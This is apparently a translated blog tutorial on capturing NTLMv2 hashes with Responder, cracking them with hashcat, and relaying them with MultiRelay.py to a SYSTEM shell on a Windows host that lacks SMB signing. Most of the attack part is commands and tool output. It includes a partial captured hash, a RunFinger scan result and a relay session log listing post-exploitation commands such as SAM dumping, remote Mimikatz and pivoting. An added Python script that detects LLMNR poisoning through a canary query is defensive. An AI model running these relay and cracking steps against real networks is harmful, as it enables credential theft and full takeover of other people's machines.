
Capturing NTLMv2 hashes with Responder

Posted: 2023-05-05 10:21:39  Views: 268113  Author: 1105

Contents:
Responder setup and download
Capturing the NTLMv2 hash, then cracking it
  Capturing NTLMv2
  Cracking the password with hashcat
Relaying to get a shell
Reference article

Responder setup

Download: https://github.com/lgandx/Responder

Responder poisons LLMNR and NBT-NS requests.
Responder.conf in the tool's directory controls which modules are enabled.
If you only need to capture NTLMv2 hashes, the default configuration is sufficient; the hashes are then brute-forced with Hashcat.
If you want to use NTLM relay, the configuration file has to be modified.
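Because Responder works by answering LLMNR queries for names that no legitimate host owns, a defender can detect a poisoner by multicasting a query for a name that must not exist and alerting on any answer. The following script is an added example, not part of the original post or of the Responder project; the canary name llmnr-canary-xyz is an arbitrary constructed value, and build_llmnr_query, parse_llmnr_answers and probe are helper names chosen here.

```python
import random, socket, struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # RFC 4795 multicast group and port

def build_llmnr_query(name: str, txid: int) -> bytes:
    """Build an LLMNR A-record query; LLMNR reuses the DNS wire format."""
    labels = b"".join(bytes([len(p)]) + p.encode() for p in name.split("."))
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)   # flags=0, QDCOUNT=1
    return header + labels + b"\x00" + struct.pack(">HH", 1, 1)   # QTYPE=A, QCLASS=IN

def _skip_name(data: bytes, off: int) -> int:
    """Advance past a DNS-style name: a run of labels or a 2-byte compression pointer."""
    while data[off] != 0 and data[off] & 0xC0 != 0xC0:
        off += 1 + data[off]
    return off + (2 if data[off] & 0xC0 == 0xC0 else 1)

def parse_llmnr_answers(data: bytes, txid: int) -> list:
    """Return the IPv4 addresses carried in A records of a response to txid."""
    if len(data) < 12:
        return []
    rid, flags, qdcount, ancount = struct.unpack(">HHHH", data[:8])
    if rid != txid or not flags & 0x8000:   # wrong transaction id, or not a response
        return []
    off = 12
    for _ in range(qdcount):                # skip the echoed question section
        off = _skip_name(data, off) + 4
    ips = []
    for _ in range(ancount):
        off = _skip_name(data, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", data[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:       # A record
            ips.append(socket.inet_ntoa(data[off:off + 4]))
        off += rdlen
    return ips

def probe(name: str = "llmnr-canary-xyz", timeout: float = 2.0) -> list:
    """Multicast a query for a name that must not exist; any answer is a poisoner."""
    txid, hits = random.randint(0, 0xFFFF), []   # canary name is a constructed value
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        try:
            while True:                     # collect every answer until the timeout
                data, (src, _port) = sock.recvfrom(1024)
                hits.extend((src, ip) for ip in parse_llmnr_answers(data, txid))
        except socket.timeout:
            pass
    return hits                             # list of (answering host, IP it claims)
```

Run probe() periodically from a monitoring host; a non-empty result means some host on the segment answered for a name that does not exist, which is exactly the behaviour this post relies on.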

Capturing the NTLMv2 hash, then cracking it

Kali ships with Hashcat, which saves the trouble of installing it.
After unpacking Responder on Linux, change into its directory and run:

Capturing NTLMv2

python Responder.py -I eth0

Here eth0 is the interface to listen on.
In my local testing, NTLMv2 hashes were captured in both a domain environment and a workgroup environment.

After capture, the records can be found under ./log.

Cracking the password with hashcat

hashcat -m 5600 Administrator::TEST:2f1fd6519d27c[...]root/1234.txt --force

Here 5600 is the hashcat mode for NTLMv2. To keep the test quick, only a few candidate passwords were used.

Relaying to get a shell

The precondition for this method is that SMB signing is not enabled; by default only domain controllers use SMB signing.
For how to enable it, see:

https://www.cnblogs.com/xiejn/p/13686620.html

Configure Responder.conf

RunFinger.py and MultiRelay.py are located under ./tools.
Use RunFinger.py to check whether SMB signing is enabled:

[root@localhost tools]# python RunFinger.py -i 192.168.164.138
[SMB2]:['192.168.164.138', Os:'Windows 7/Server 2008R2', Build:'7601', Domain:'WIN-ORHR1E13JIO', Bootime: 'Last restart: 2021-03-03 17:08:46', Signing:'False', RDP:'True', SMB1:'Enabled']

Relay with MultiRelay.py:

python3 MultiRelay.py -t 192.168.164.138 -u ALL

The IP here should be the same one checked above; that is, the targeted IP must not have SMB signing enabled.
Simulating use of the SMB service

Simply make a request to any host.

[root@localhost tools]# python3 MultiRelay.py -t 192.168.164.138 -u ALL
Crypto lib is not installed. You won't be able to live dump the hashes.
You can install it on debian based os with this command: apt-get install python-crypto
The Sam file will be saved anyway and you will have the bootkey.

Responder MultiRelay 2.5 NTLMv1/2 Relay

Send bugs/hugs/comments to: laurent.gaffie@gmail.com
Usernames to relay (-u) are case sensitive.
To kill this script hit CTRL-C.

/*
Use this script in combination with Responder.py for best results.
Make sure to set SMB and HTTP to OFF in Responder.conf.
This tool listen on TCP port 80, 3128 and 445.
For optimal pwnage, launch Responder only with these 2 options:
-rv
Avoid running a command that will likely prompt for information like net use, etc.
If you do so, use taskkill (as system) to kill the process.
*/

Relaying credentials for these users:
['ALL']

Retrieving information for 192.168.164.138...
SMB signing: False
Os version: 'Windows Server 2008 R2 Datacenter 7601 Service Pack 1'
Hostname: 'WIN-ORHR1E13JIO'
Part of the 'WORKGROUP' domain
[+] Setting up SMB relay with SMB challenge: 9707c4caa56863f4
[+] Received NTLMv2 hash from: 192.168.164.139
[+] Client info: ['Windows Server 2008 R2 Datacenter 7601 Service Pack 1', domain: 'WORKGROUP', signing:'False']
[+] Username: Administrator is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.
[+] Looks good, Administrator has admin rights on C$.
[+] Authenticated.
[+] Dropping into Responder's interactive shell, type "exit" to terminate

Available commands:
dump               -> Extract the SAM database and print hashes.
regdump KEY        -> Dump an HKLM registry key (eg: regdump SYSTEM)
read Path_To_File  -> Read a file (eg: read /windows/win.ini)
get  Path_To_File  -> Download a file (eg: get users/administrator/desktop/password.txt)
delete Path_To_File-> Delete a file (eg: delete /windows/temp/executable.exe)
upload Path_To_File-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in windows\temp
runas Command      -> Run a command as the currently logged in user. (eg: runas whoami)
scan /24           -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to
pivot IP address   -> Connect to another host (eg: pivot 10.0.0.12)
mimi command       -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)
mimi32 command     -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)
lcmd command       -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)
help               -> Print this message.
exit               -> Exit this shell and return in relay mode.
                      If you want to quit type exit and then use CTRL-C

Any other command than that will be run as SYSTEM on the target.

Connected to 192.168.164.138 as LocalSystem.
C:\Windows\system32:#

A shell was obtained successfully.
However, when reproducing this locally, the machine in the domain environment could not be relayed to; on inspection it could not be logged into over SMB with the normal login method either. A freshly cloned machine that was not joined to the domain worked, so it may have been a problem with my virtual machine.

Reference article

https://xz.aliyun.com/t/3560
